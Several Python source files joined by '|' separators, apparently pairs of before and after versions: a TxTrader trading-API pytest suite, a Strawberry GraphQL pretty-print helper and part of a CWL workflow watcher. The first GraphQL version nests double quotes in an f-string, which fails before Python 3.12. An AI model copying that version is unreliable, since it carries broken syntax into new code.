oid = t['permid']
status = t['status']
print('Created staged order %s with status %s, waiting 5 seconds, then changing order to auto-execute' % (oid, status))
tickets = api.query_tickets()
assert oid in tickets
orders = api.query_orders()
assert not oid in orders
time.sleep(5)
status = api.query_order(oid)['status']
print('cancelling order %s with status=%s...' % (oid, status))
r = api.cancel_order(oid)
print('cancel returned %s' % repr(r))
assert r
_wait_for_fill(api, oid, True)
o = api.query_order(oid)
print('order: %s' % o)
print('cancel confirmed oid=%s, status=%s' % (oid, o['status']))
t = api.market_order(account, route, trade_symbol, trade_quantity)
assert t
assert type(t) == dict
new_oid = t['permid']
assert new_oid != oid
print('submitted trade as new order %s' % new_oid)
_wait_for_fill(api, new_oid)
print('detected execution of %s' % new_oid)
o = api.query_order(new_oid)
if WAIT_FOR_FILL:
assert o['status'] == 'Filled'
else:
print('not testing order results')
def test_query_orders(api):
orders = api.query_orders()
assert orders != None
assert type(orders) == dict
def test_trade_and_query_orders(api):
oid = _market_order(api, 'AAPL', 1)
orders = api.query_orders()
assert orders != None
assert type(orders) == dict
assert oid in orders
assert type(orders[oid]) == dict
assert orders[oid]['permid'] == oid
assert 'status' in orders[oid]
tickets = api.query_tickets()
assert tickets != None
assert not oid in tickets
def test_query_executions(api):
execs = api.query_executions()
assert type(execs) == dict
assert execs != None
def test_trade_and_query_executions_and_query_order(api):
oid = _market_order(api, 'AAPL', 10)
oid = str(oid)
print('oid: %s' % oid)
execs = api.query_executions()
print('execs: %s' % repr(execs.keys()))
assert type(execs) == dict
assert execs != None
xid = None
start_time = time.time()
while not xid:
execs = api.query_executions()
for k, v in execs.items():
# NOTE: new execution format includes ORIGINAL_ORDER_ID which matches the permid of the associated order
if str(v['ORIGINAL_ORDER_ID']) == oid:
xid = k
print('----------------')
print('k=%s' % k)
print('v=%s' % repr(v))
print('%s %s %s' % (xid, v['ORIGINAL_ORDER_ID'], oid))
assert (time.time() - start_time) < 10, "timeout waiting for execution results"
assert xid
assert str(execs[xid]['ORIGINAL_ORDER_ID']) == oid
o = api.query_order(oid)
assert o
assert oid == o['permid']
assert 'status' in o
if WAIT_FOR_FILL:
assert o['status'] == 'Filled'
"""
ALGO ORDER fields per 2018-07-24 email from Raymond Tsui (rtsui@ezsoft.com)
"""
@pytest.mark.algo
def test_algo_order(api):
print()
ret = api.get_order_route()
assert type(ret) == dict
assert len(ret.keys()) == 1
oldroute = list(ret.keys())[0]
assert type(oldroute) == str
assert ret[oldroute] == None
assert oldroute in ['DEMO', 'DEMOEUR']
algo_order_parameters = {
"STRAT_ID": "BEST",
"BOOKING_TYPE": 3,
"STRAT_TIME_TAGS": "168;126",
"STRAT_PARAMETERS": {
"99970": "2",
"99867": "N",
"847": "BEST",
"90057": "BEST",
"91000": "4.1.95"
},
"ORDER_FLAGS_3": 0,
"ORDER_CLONE_FLAG": 1,
"STRAT_TARGET": "ATDL",
"STRATEGY_NAME": "BEST",
"STRAT_REDUNDANT_DATA": {
"UseStartTime": "false",
"UseEndTime": "false",
"cConditionalType": "{NULL}"
},
"STRAT_TIME_ZONE": "America/New_York",
"STRAT_TYPE": "COWEN_ATM_US_EQT",
"STRAT_STRING_40": "BEST",
"UTC_OFFSET": "-240"
}
route = 'TEST-ATM-ALGO'
p = {route: algo_order_parameters}
ret = api.set_order_route(p)
assert ret
assert api.get_order_route() == p
oid = _market_order(api, 'INTC', 100)
assert api.query_order(oid)['status'] == 'Filled'
assert api.set_order_route(oldroute)
def test_trade_submission_error_bad_symbol(api):
account = api.account
route = 'DEMOEUR'
o = api.market_order(account, route, 'BADSYMBOL', 100)
assert o
assert o['status'] == 'Error'
#print('order: %s' % repr(o))
def test_trade_submission_error_bad_quantity(api):
account = api.account
route = 'DEMOEUR'
o = api.market_order(account, route, 'AAPL', 0)
assert o
if o['status'] != 'Error':
oid = o['permid']
_wait_for_fill(api, oid, True)
o = api.query_order(oid)
assert o['status'] == 'Error'
#print('order: %s' % repr(o))
#TODO: test other order types
# def json_limit_order(self, args, d):
# """limit_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stop_order(self, args, d):
# """stop_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stoplimit_order(self, args, d):
# """stoplimit_order('symbol', stop_price, limit_price, quantity) => {'field':, data, ...}
@pytest.mark.bars
def test_bars(api):
assert api.add_symbol('SPY')
sbar = '2017-08-29 09:30:00'
ebar = '2017-08-29 09:40:00'
bars = api.query_bars('SPY', 1, sbar, ebar)
if _verify_barchart_enabled(api, 'BARCHART'):
assert bars
assert type(bars) == list
for bar in bars:
assert type(bar) == list
b_date, b_time, b_open, b_high, b_low, b_close, b_volume = bar
assert type(b_date) == str
assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', b_date)
assert type(b_time) == str
assert re.match('^\\d\\d:\\d\\d:\\d\\d$', b_time)
assert type(b_open) == float
assert type(b_high) == float
assert type(b_low) == float
assert type(b_close) == float
assert type(b_volume) == int
print('%s %s %.2f %.2f %.2f %.2f %d' % (b_date, b_time, b_open, b_high, b_low, b_close, b_volume))
else:
assert not bars
print('bars=%s' % repr(bars))
def test_cancel_order(api):
ret = api.cancel_order('000')
assert ret
def test_global_cancel(api):
ret = api.global_cancel()
assert ret
@pytest.mark.skip
def json_gateway_logon(api):
ret = api.gateway_logon('user', 'passwd')
assert ret
@pytest.mark.skip
def test_gateway_logoff(api):
ret = api.gateway_logoff()
assert ret
@pytest.mark.skip
def test_set_primary_exchange(api):
if TEST_MODE == 'RTX':
exchange = 'NAS'
elif TEST_MODE == 'TWS':
exchange = 'NASDAQ'
assert api.set_primary_exchange('MSFT', exchange)
assert api.add_symbol('MSFT')
assert api.query_symbol('MSFT')
def test_help(api):
help = api.help()
assert help
| # -*- coding: utf-8 -*-
"""
test-txtrader.py
--------------
TxTrader unit/regression test script
Copyright (c) 2016 Reliance Systems Inc. <mkrueger@rstms.net>
Licensed under the MIT license. See LICENSE for details.
"""
from txtrader_client import API
import subprocess
import os
import signal
import time
import ujson as json
from pprint import pprint, pformat
import pytest
import re
import datetime
WAIT_FOR_FILL = False
FILL_TIMEOUT = 30
TEST_ALGO_ROUTE = '{"TEST-ATM-ALGO":{"STRAT_ID":"BEST","BOOKING_TYPE":"3","STRAT_TIME_TAGS":"168;126","STRAT_PARAMETERS":{"99970":"2","99867":"N","847":"BEST","90057":"BEST","91000":"4.1.95"},"ORDER_FLAGS_3":"0","ORDER_CLONE_FLAG":"1","STRAT_TARGET":"ATDL","STRATEGY_NAME":"BEST","STRAT_REDUNDANT_DATA":{"UseStartTime":"false","UseEndTime":"false","cConditionalType":"{NULL}"},"STRAT_TIME_ZONE":"America/New_York","STRAT_TYPE":"COWEN_ATM_US_EQT","STRAT_STRING_40":"BEST","UTC_OFFSET":"-240"}}'
TEST_MODE = 'RTX'
TEST_HOST = os.environ['TXTRADER_HOST']
TEST_PORT = int(os.environ['TXTRADER_HTTP_PORT'])
def _listening(host, port, timeout=15):
return not bool(os.system(f'wait-for-it -s {host}:{port} -t {timeout}'))
def _wait_api_status(TEST_MODE, timeout=15):
start = time.time()
status = None
last_status = None
api = None
while status != 'Up':
try:
if not api:
api = API(TEST_MODE)
print(f'new api connection: {api}')
except Exception as ex:
print(f'Connection raised {ex}, retrying...')
api = None
time.sleep(1)
else:
assert api
try:
status = api.status()
except Exception as ex:
print(f'status query on {api} raised {ex}, retrying...')
api = None
time.sleep(1)
else:
if last_status != status:
print(f"status={status}")
last_status = status
assert (time.time() - start) < timeout, 'timeout waiting for initialization'
time.sleep(1)
return api
@pytest.fixture(scope='module')
def api():
print('fixture: creating api connection')
assert _listening(TEST_HOST, TEST_PORT)
api = _wait_api_status(TEST_MODE)
return api
def dump(label, o):
print('%s:\n%s' % (label, pformat(json.dumps(o))))
def test_init(api):
print()
print('test_init checking api')
assert api
assert api.status() == 'Up'
print('waiting 1 second...')
time.sleep(1)
print('done')
def test_shutdown_and_reconnect():
print('\nconnecting...')
api = _wait_api_status(TEST_MODE)
assert api
assert api.status() == 'Up'
shutdown_time = time.time()
shutdown = time.time()
print('shutting down api')
try:
api.shutdown('testing shutdown request')
print('waiting for shutdown...')
time.sleep(5)
print('waiting for restart...')
except Exception as ex:
print(f'shutdown raised {ex}')
assert False
assert _listening(TEST_HOST, TEST_PORT, 60), 'timeout waiting for restart'
try:
api = _wait_api_status(TEST_MODE, 90)
except Exception as ex:
print(f'restart raised {ex}')
assert False
assert api
assert api.status() == 'Up'
def test_stock_prices(api):
slist = set(api.query_symbols())
s = api.add_symbol('IBM')
assert s
p = api.query_symbol('IBM')
assert p
assert type(p) == dict
print(repr(p))
tdata = [
('symbol', str, True),
('fullname', str, True),
('last', float, True),
('size', int, True),
('volume', int, True),
('open', float, True),
('high', float, True),
('low', float, True),
('close', float, True),
('vwap', float, True),
('tradetime', str, True),
('cusip', str, True),
]
#('bars', list, True),
for key, _type, required in tdata:
assert key in p
assert type(p[key]) == _type
if required:
assert not p[key] == None
r = api.query_symbol_data('IBM')
assert r
dump('raw data for IBM', r)
l = api.query_symbols()
assert l
dump('symbol list', l)
assert 'IBM' in l
s = api.add_symbol('TSLA')
assert s
dump('add TSLA', s)
s = api.add_symbol('GOOG')
assert s
dump('add GOOG', s)
s = api.add_symbol('AAPL')
assert s
dump('add AAPL', s)
l = api.query_symbols()
assert set(['IBM', 'TSLA', 'GOOG', 'AAPL']).issubset(set(l))
dump('symbol list', l)
s = api.del_symbol('TSLA')
assert s
dump('del TSLA', s)
l = api.query_symbols()
if not 'TSLA' in slist:
assert not 'TSLA' in l
assert set(['IBM', 'GOOG', 'AAPL']).issubset(set(l))
dump('symbol list', l)
print(repr(l))
def test_buy_sell(api):
print()
account = api.account
print('account=%s' % account)
api.set_account(account)
print('buying IBM')
oid = _market_order(api, 'IBM', 100)
o = api.query_order(oid)
assert o
assert type(o) == dict
assert 'permid' in o
oid = o['permid']
assert 'status' in o
dump('market_order(IBM,100)', o)
print('selling IBM')
oid = _market_order(api, 'IBM', -100)
o = api.query_order(oid)
assert o
assert type(o) == dict
assert 'permid' in o
assert 'status' in o
dump('market_order(IBM,-100)', o)
def test_set_order_route(api):
print()
oldroute = api.get_order_route()
assert type(oldroute) == dict
assert list(oldroute.keys()) == ['DEMOEUR']
r0 = 'DEMO'
r1 = {'DEMO': None}
r2 = {'DEMO': {'key1': 'value1', 'key2': 'value2'}}
r3 = TEST_ALGO_ROUTE
for rin, rout in [(r0, r1), (r1, r1), (r2, r2), (json.dumps(r0), r1), (json.dumps(r1), r1), (json.dumps(r2), r2),
(r3, json.loads(r3))]:
print('set_order_route(%s)' % repr(rin))
assert api.set_order_route(rin) == rout
assert api.get_order_route() == rout
assert api.set_order_route(oldroute) == oldroute
def test_partial_fill(api):
print()
account = api.account
route = 'DEMO'
oldroute = api.get_order_route()
assert api.set_order_route(route)
assert api.get_order_route() == {route: None}
quantity = 1000
symbol = 'COWN'
print('buying %d %s' % (quantity, symbol))
p = api.add_symbol(symbol)
assert p
d = api.query_symbol_data(symbol)
#pprint(d)
now = datetime.datetime.now().strftime('%H:%M:%S')
print(f"trading hours: {d['STARTTIME']} to {d['STOPTIME']}")
during_trading_hours = bool(d['STARTTIME'] <= now <= d['STOPTIME'])
print(f"now={now} during_trading_hours={during_trading_hours}")
o = api.market_order(account, route, symbol, quantity)
assert o
assert 'permid' in o
assert 'status' in o
assert not o['status'] == 'Filled'
oid = o['permid']
print('oid=%s' % oid)
partial_fills = 0
while o['status'] != 'Filled':
o = api.query_order(oid)
#o={'status':'spoofed','TYPE':'spoofed'}
#pprint(o)
status = o['status']
filled = o['filled'] if 'filled' in o else 0
remaining = o['remaining'] if 'remaining' in o else 0
if (int(filled) > 0) and (int(remaining) > 0) and (int(filled) < quantity):
partial_fills += 1
average_price = o['avgfillprice'] if 'avgfillprice' in o else None
print(
'status=%s filled=%s remaining=%s average_price=%s type=%s' % (status, filled, remaining, average_price, o['type'])
)
assert not (status == 'Filled' and filled < quantity)
if not during_trading_hours:
print('test verification disabled - simulated market is closed')
partial_fills = -1
break
assert status in ['Submitted', 'Pending', 'Filled']
time.sleep(1)
assert partial_fills
o = api.market_order(account, route, symbol, quantity * -1)
assert api.set_order_route(oldroute)
def test_status(api):
assert api.status() == 'Up'
def test_uptime(api):
uptime = api.uptime()
assert uptime
print('uptime: %s' % repr(uptime))
assert type(uptime) == str
def test_version(api):
assert api.version()
def test_symbol_price(api):
orig_symbols = api.query_symbols()
assert type(orig_symbols) == list
if 'AAPL' in orig_symbols:
ret = api.del_symbol('AAPL')
assert ret
symbols = api.query_symbols()
assert type(symbols) == list
if not 'AAPL' in orig_symbols:
assert not 'AAPL' in symbols
price = api.query_symbol('AAPL')
#assert not price
assert price
ret = api.add_symbol('AAPL')
assert ret
p = api.query_symbol('AAPL')
assert p
assert type(p) == dict
assert p['symbol'] == 'AAPL'
def _verify_barchart_enabled(api, option):
v = api.version()
assert option in ['SYMBOL_BARCHART', 'BARCHART']
assert v
assert type(v) == dict
assert type(v['flags']) == dict
assert option in v['flags']
return v['flags'][option] == True
def test_symbol_bars(api):
if 'TSLA' in api.query_symbols():
assert api.del_symbol('TSLA')
assert api.add_symbol('TSLA')
assert 'TSLA' in api.query_symbols()
bars = api.query_symbol_bars('TSLA')
assert type(bars) == list
print(repr(bars))
if _verify_barchart_enabled(api, 'SYMBOL_BARCHART'):
assert type(bars[0]) == list
for bar in bars:
print('%s' % repr(bar))
for i in range(len(bar)):
assert type(bar[i]) in [[str], [str], [float], [float], [float], [float], [int]][i]
assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', bar[0])
assert re.match('^\\d\\d:\\d\\d:\\d\\d$', bar[1])
else:
print('barchart disabled')
assert bars == []
def test_query_accounts(api):
test_account = api.account
accounts = api.query_accounts()
assert type(accounts) == list
assert accounts
for a in accounts:
assert type(a) == str or type(a) == str
assert test_account in accounts
ret = api.set_account(test_account)
assert ret
ret = api.query_account('b.b.b.INVALID_ACCOUNT')
assert ret == None
ret = api.query_account(test_account, 'INVALID_FIELD')
assert ret == None
ret = api.query_account(test_account, 'INVALID_FIELD_1,INVALID_FIELD_2')
assert ret == None
#print('query_account(%s)...' % a)
data = api.query_account(test_account)
#print('account[%s]: %s' % (a, repr(data)))
assert data
assert type(data) == dict
fields = [k for k in data if not k.startswith('_')]
if TEST_MODE == 'RTX':
field = 'EXCESS_EQ'
elif TEST_MODE == 'TWS':
field = 'LiquidationValue'
# txtrader is expected to set the value _cash to the correct field
assert '_cash' in data
assert float(data['_cash']) == round(float(data[field]), 2)
sdata = api.query_account(test_account, field)
assert sdata
assert type(sdata) == dict
assert field in sdata
rfields = ','.join(fields[:3])
print('requesting fields: %s' % rfields)
sdata = api.query_account(test_account, rfields)
print('got %s' % repr(sdata))
assert sdata
assert type(sdata) == dict
for field in rfields.split(','):
assert field in sdata
assert set(rfields.split(',')) == set(sdata.keys())
#print('account[%s]: %s' % (a, repr(sdata)))
def _wait_for_fill(api, oid, return_on_error=False):
print('Waiting for order %s to fill...' % oid)
done = False
last_status = ''
count = 0
while not done:
o = api.query_order(oid)
if last_status != o['status']:
last_status = o['status']
print('order status: %s' % o['status'])
if return_on_error and o['status'] == 'Error':
return
assert o['status'] != 'Error'
if o['status'] == 'Filled':
done = True
else:
count += 1
if WAIT_FOR_FILL:
assert count < FILL_TIMEOUT
time.sleep(1)
else:
if o['status'] == 'Pending':
print("fill wait disabled, returning")
done = True
def _position(api, account):
pos = api.query_positions()
assert type(pos) == dict
assert account in pos
if account in pos:
p = pos[account]
assert type(p) == dict
else:
p = {}
return p
def _market_order(api, symbol, quantity, return_on_error=False):
print('Sending market_order(%s, %d)...' % (symbol, quantity))
account = api.account
route = 'DEMOEUR'
o = api.market_order(account, route, symbol, quantity)
print('market_order returned %s' % repr(o))
assert o
assert 'permid' in o
assert 'status' in o
oid = o['permid']
assert type(oid) == str
print('market_order(%s,%s) returned oid=%s status=%s' % (symbol, quantity, oid, o['status']))
_wait_for_fill(api, oid, return_on_error)
return oid
def test_trades(api):
account = api.account
route = 'DEMOEUR'
oid = _market_order(api, 'AAPL', 1)
p = _position(api, account)
if 'AAPL' in p and p['AAPL'] != 0:
oid = _market_order(api, 'AAPL', -1 * p['AAPL'])
ostat = api.query_order(oid)
assert ostat
assert type(ostat) == dict
assert 'permid' in ostat
p = _position(api, account)
if WAIT_FOR_FILL:
assert not 'AAPL' in p or p['AAPL'] == 0
else:
print('not testing order results')
oid = _market_order(api, 'AAPL', 100)
p = _position(api, account)
assert p
assert type(p) == dict
if WAIT_FOR_FILL:
assert 'AAPL' in p
assert p['AAPL'] == 100
else:
print('not testing order results')
oid = _market_order(api, 'AAPL', -10)
p = _position(api, account)
if WAIT_FOR_FILL:
assert 'AAPL' in p
assert p['AAPL'] == 90
else:
print('not testing order results')
@pytest.mark.staged
def test_staged_trades(api):
account = api.account
route = 'DEMOEUR'
t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'GOOG', 10)
assert t
assert type(t) == dict
assert 'permid' in t
oid = t['permid']
print('Created staged order %s, awaiting user execution from RealTick' % oid)
_wait_for_fill(api, oid)
@pytest.mark.staged
def test_staged_trade_cancel(api):
account = api.account
route = 'DEMOEUR'
t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'INTC', 10)
assert t
assert type(t) == dict
assert 'permid' in t
oid = t['permid']
print('Created staged order %s, awaiting user cancellation from RealTick' % oid)
_wait_for_fill(api, oid, True)
t = api.query_order(oid)
assert t
assert type(t) == dict
assert 'status' in t
assert t['status'] == 'Error'
assert 'REASON' in t['raw']
assert t['raw']['REASON'].lower().startswith('user cancel')
print('detected user cancel of %s' % oid)
#@pytest.mark.staged
def test_staged_trade_execute(api):
account = api.account
route = 'DEMOEUR'
trade_symbol = 'AAPL'
trade_quantity = 10
t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, trade_symbol, trade_quantity)
assert t
assert type(t) == dict
assert 'permid' in t
oid = t['permid']
status = t['status']
print('Created staged order %s with status %s, waiting 5 seconds, then changing order to auto-execute' % (oid, status))
tickets = api.query_tickets()
assert oid in tickets
orders = api.query_orders()
assert not oid in orders
time.sleep(5)
status = api.query_order(oid)['status']
print('cancelling order %s with status=%s...' % (oid, status))
r = api.cancel_order(oid)
print('cancel returned %s' % repr(r))
assert r
_wait_for_fill(api, oid, True)
o = api.query_order(oid)
print('order: %s' % o)
print('cancel confirmed oid=%s, status=%s' % (oid, o['status']))
t = api.market_order(account, route, trade_symbol, trade_quantity)
assert t
assert type(t) == dict
new_oid = t['permid']
assert new_oid != oid
print('submitted trade as new order %s' % new_oid)
_wait_for_fill(api, new_oid)
print('detected execution of %s' % new_oid)
o = api.query_order(new_oid)
if WAIT_FOR_FILL:
assert o['status'] == 'Filled'
else:
print('not testing order results')
def test_query_orders(api):
orders = api.query_orders()
assert orders != None
assert type(orders) == dict
def test_trade_and_query_orders(api):
oid = _market_order(api, 'AAPL', 1)
orders = api.query_orders()
assert orders != None
assert type(orders) == dict
assert oid in orders
assert type(orders[oid]) == dict
assert orders[oid]['permid'] == oid
assert 'status' in orders[oid]
tickets = api.query_tickets()
assert tickets != None
assert not oid in tickets
def test_query_executions(api):
execs = api.query_executions()
assert type(execs) == dict
assert execs != None
def test_trade_and_query_executions_and_query_order(api):
oid = _market_order(api, 'AAPL', 10)
oid = str(oid)
print('oid: %s' % oid)
execs = api.query_executions()
print('execs: %s' % repr(execs.keys()))
assert type(execs) == dict
assert execs != None
xid = None
start_time = time.time()
while not xid:
execs = api.query_executions()
for k, v in execs.items():
# NOTE: new execution format includes ORIGINAL_ORDER_ID which matches the permid of the associated order
if str(v['ORIGINAL_ORDER_ID']) == oid:
xid = k
print('----------------')
print('k=%s' % k)
print('v=%s' % repr(v))
print('%s %s %s' % (xid, v['ORIGINAL_ORDER_ID'], oid))
assert (time.time() - start_time) < 10, "timeout waiting for execution results"
assert xid
assert str(execs[xid]['ORIGINAL_ORDER_ID']) == oid
o = api.query_order(oid)
assert o
assert oid == o['permid']
assert 'status' in o
if WAIT_FOR_FILL:
assert o['status'] == 'Filled'
"""
ALGO ORDER fields per 2018-07-24 email from Raymond Tsui (rtsui@ezsoft.com)
"""
@pytest.mark.algo
def test_algo_order(api):
print()
ret = api.get_order_route()
assert type(ret) == dict
assert len(ret.keys()) == 1
oldroute = list(ret.keys())[0]
assert type(oldroute) == str
assert ret[oldroute] == None
assert oldroute in ['DEMO', 'DEMOEUR']
algo_order_parameters = {
"STRAT_ID": "BEST",
"BOOKING_TYPE": 3,
"STRAT_TIME_TAGS": "168;126",
"STRAT_PARAMETERS": {
"99970": "2",
"99867": "N",
"847": "BEST",
"90057": "BEST",
"91000": "4.1.95"
},
"ORDER_FLAGS_3": 0,
"ORDER_CLONE_FLAG": 1,
"STRAT_TARGET": "ATDL",
"STRATEGY_NAME": "BEST",
"STRAT_REDUNDANT_DATA": {
"UseStartTime": "false",
"UseEndTime": "false",
"cConditionalType": "{NULL}"
},
"STRAT_TIME_ZONE": "America/New_York",
"STRAT_TYPE": "COWEN_ATM_US_EQT",
"STRAT_STRING_40": "BEST",
"UTC_OFFSET": "-240"
}
route = 'TEST-ATM-ALGO'
p = {route: algo_order_parameters}
ret = api.set_order_route(p)
assert ret
assert api.get_order_route() == p
oid = _market_order(api, 'INTC', 100)
assert api.query_order(oid)['status'] == 'Filled'
assert api.set_order_route(oldroute)
def test_trade_submission_error_bad_symbol(api):
account = api.account
route = 'DEMOEUR'
o = api.market_order(account, route, 'BADSYMBOL', 100)
assert o
assert o['status'] == 'Error'
#print('order: %s' % repr(o))
def test_trade_submission_error_bad_quantity(api):
account = api.account
route = 'DEMOEUR'
o = api.market_order(account, route, 'AAPL', 0)
assert o
if o['status'] != 'Error':
oid = o['permid']
_wait_for_fill(api, oid, True)
o = api.query_order(oid)
assert o['status'] == 'Error'
#print('order: %s' % repr(o))
#TODO: test other order types
# def json_limit_order(self, args, d):
# """limit_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stop_order(self, args, d):
# """stop_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stoplimit_order(self, args, d):
# """stoplimit_order('symbol', stop_price, limit_price, quantity) => {'field':, data, ...}
@pytest.mark.bars
def test_bars(api):
assert api.add_symbol('SPY')
sbar = '2017-08-29 09:30:00'
ebar = '2017-08-29 09:40:00'
bars = api.query_bars('SPY', 1, sbar, ebar)
if _verify_barchart_enabled(api, 'BARCHART'):
assert bars
assert type(bars) == list
for bar in bars:
assert type(bar) == list
b_date, b_time, b_open, b_high, b_low, b_close, b_volume = bar
assert type(b_date) == str
assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', b_date)
assert type(b_time) == str
assert re.match('^\\d\\d:\\d\\d:\\d\\d$', b_time)
assert type(b_open) == float
assert type(b_high) == float
assert type(b_low) == float
assert type(b_close) == float
assert type(b_volume) == int
print('%s %s %.2f %.2f %.2f %.2f %d' % (b_date, b_time, b_open, b_high, b_low, b_close, b_volume))
else:
assert not bars
print('bars=%s' % repr(bars))
def test_cancel_order(api):
ret = api.cancel_order('000')
assert ret
def test_global_cancel(api):
ret = api.global_cancel()
assert ret
@pytest.mark.skip
def json_gateway_logon(api):
ret = api.gateway_logon('user', 'passwd')
assert ret
@pytest.mark.skip
def test_gateway_logoff(api):
ret = api.gateway_logoff()
assert ret
@pytest.mark.skip
def test_set_primary_exchange(api):
if TEST_MODE == 'RTX':
exchange = 'NAS'
elif TEST_MODE == 'TWS':
exchange = 'NASDAQ'
assert api.set_primary_exchange('MSFT', exchange)
assert api.add_symbol('MSFT')
assert api.query_symbol('MSFT')
def test_help(api):
help = api.help()
assert help
|
import datetime
import json
from json import JSONEncoder
from typing import Any, Dict, Optional
from pygments import highlight, lexers
from pygments.formatters import Terminal256Formatter
from .graphql_lexer import GraphQLLexer
class StrawberryJSONEncoder(JSONEncoder):
def default(self, o: Any) -> Any:
return repr(o)
def pretty_print_graphql_operation(
operation_name: Optional[str], query: str, variables: Optional[Dict["str", Any]]
):
"""Pretty print a GraphQL operation using pygments.
Won't print introspection operation to prevent noise in the output."""
if operation_name == "IntrospectionQuery":
return
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f"[{now}]: {operation_name or "No operation name"}")
print(highlight(query, GraphQLLexer(), Terminal256Formatter()))
if variables:
variables_json = json.dumps(variables, indent=4, cls=StrawberryJSONEncoder)
print(highlight(variables_json, lexers.JsonLexer(), Terminal256Formatter()))
| import datetime
import json
from json import JSONEncoder
from typing import Any, Dict, Optional
from pygments import highlight, lexers
from pygments.formatters import Terminal256Formatter
from .graphql_lexer import GraphQLLexer
class StrawberryJSONEncoder(JSONEncoder):
def default(self, o: Any) -> Any:
return repr(o)
def pretty_print_graphql_operation(
operation_name: Optional[str], query: str, variables: Optional[Dict["str", Any]]
):
"""Pretty print a GraphQL operation using pygments.
Won't print introspection operation to prevent noise in the output."""
if operation_name == "IntrospectionQuery":
return
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f"[{now}]: {operation_name or 'No operation name'}")
print(highlight(query, GraphQLLexer(), Terminal256Formatter()))
if variables:
variables_json = json.dumps(variables, indent=4, cls=StrawberryJSONEncoder)
print(highlight(variables_json, lexers.JsonLexer(), Terminal256Formatter()))
|
import glob
import os
from pathlib import Path
import subprocess as sub
import sys
import time
from typing import Any, Dict, List
from unittest.mock import patch
import graphviz
import networkx as nx
import json
from jsonschema import Draft202012Validator
"""from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
from watchdog.events import FileSystemEvent, PatternMatchingEventHandler"""
from .wic_types import GraphReps, Tools, YamlTree, Json, GraphData
from .main import get_tools_cwl, get_yml_paths
from .schemas import wic_schema
from . import ast, cli, compiler, inference, utils
def absolute_paths(json: Json, cachedir_path: Path) -> Json:
"""Recursively searches for paths in json and makes them absolute by prepending cachedir_path.
Args:
json (Json): The contents of the YAML cwl_watcher config: tag.
cachedir_path (Path): The --cachedir directory of the main workflow.
Returns:
Json: The contents of the YAML cwl_watcher config: tag, with all paths prepended with cachedir_path.
"""
new_json: Json = {}
for key, val in json.items():
if isinstance(val, Dict):
new_val = absolute_paths(val, cachedir_path)
else:
new_val = val
# TODO: Improve this heuristic
if 'input' in key and 'path' in key:
new_val = str(cachedir_path / val) # type: ignore
changed_files = file_watcher_glob(cachedir_path, val, {})
# We require unique filenames, so there should only be one file.
# TODO: check
for file in changed_files:
new_val = str(Path(file).absolute()) # type: ignore
new_json[key] = new_val
return new_json
def rerun_cwltool(directory_realtime: Path, cachedir_path: Path, cwl_tool: str,
args_vals: Json, tools_cwl: Tools, yml_paths: Dict[str, Path],
validator: Draft202012Validator) -> None:
"""This will speculatively execute cwltool for real-time analysis purposes.\n
It will NOT check for return code 0. See docs/userguide.md
Args:
directory_realtime (Path): The working directory of the main workflow. Currently unused to avoid this workflow from overwriting files from the main workflow (which by design will likely be running concurrently with this code).
cachedir_path (Path): The --cachedir directory of the main workflow.
cwl_tool (str): The CWL CommandLineTool or YAML filename (without extension).
args_vals (Json): The contents of the YAML cwl_watcher config: tag.
tools_cwl (Tools): The CWL CommandLineTool definitions found using get_tools_cwl()
yml_paths (Dict[str, Path]): The yml workflow definitions found using get_yml_paths()
validator (Draft202012Validator): Used to validate the \*.yml files against the autogenerated schema.
"""
try:
# Make paths in arguments absolute w.r.t the realtime directory. See below.
args_vals_new = absolute_paths(args_vals, cachedir_path)
# Construct a single-step workflow and add its arguments
#import yaml
if Path(cwl_tool).suffix == '.yml':
yaml_path = cwl_tool
root_yaml_tree = {'wic': {'steps': {f'(1, {cwl_tool})': {'wic': {'steps': args_vals_new}}}}, 'steps': [{cwl_tool: None}]}
#print('root_yaml_tree')
#print(yaml.dump(root_yaml_tree))
yaml_tree_raw = ast.read_AST_from_disk(YamlTree(yaml_path, root_yaml_tree), yml_paths, tools_cwl, validator)
yaml_tree = ast.merge_yml_trees(yaml_tree_raw, {}, tools_cwl)
yml = yaml_tree.yml
else:
yml = {'steps': [{cwl_tool: args_vals_new}]}
#print('yml')
#print(yml)
#print(yaml.dump(yml))
# Measure compile time
time_initial = time.time()
# Setup dummy args
testargs = ['wic', '--yaml', '', '--cwl_output_intermediate_files', 'True'] # ignore --yaml
# For now, we need to enable --cwl_output_intermediate_files. See comment in compiler.py
with patch.object(sys, 'argv', testargs):
args = cli.parser.parse_args()
yaml_path = f'{cwl_tool}_only.yml'
yaml_tree = YamlTree(yaml_path, yml)
subgraph = GraphReps(graphviz.Digraph(name=yaml_path), nx.DiGraph(), GraphData(yaml_path))
compiler_info = compiler.compile_workflow(yaml_tree, args, [], [subgraph], {}, {}, tools_cwl, True, relative_run_path=False)
rose_tree = compiler_info.rose
working_dir = Path('.') # Use a new working directory.
# Can also use `directory_realtime` at the risk of overwriting other files.
utils.write_to_disk(rose_tree, working_dir, relative_run_path=False)
time_final = time.time()
print(f'compile time for {cwl_tool}: {round(time_final - time_initial, 4)} seconds')
# NOTE: Since we are running cwltool 'within' cwltool, the inner
# cwltool command will get run from working_dir, but then cwl_tool
# will run within some other hashed directory in .../cachedir/
# The solution is to modify the input paths above to be absolute.
# The easiest way to do this for now is recompiling. This adds a few
# seconds, but most of the time will be CWL validation and runtime.
# Alternatively, we could try to compile once in main() and then
# make the paths absolute in f'{cwl_tool}_only_inputs.yml' here.
cmd: List[str] = ['cwltool', '--cachedir', str(cachedir_path), f'{cwl_tool}_only.cwl', f'{cwl_tool}_only_inputs.yml']
#proc = sub.run(self.cmd, cwd=working_dir)
#cmd = self.cmd
print('Running', cmd)
proc = sub.run(cmd, cwd=working_dir)
print('inner cwltool completed')
# Don't check the return code because the file may not exist yet, or
# because speculative execution may fail for any number of reasons.
# proc.check_returncode()
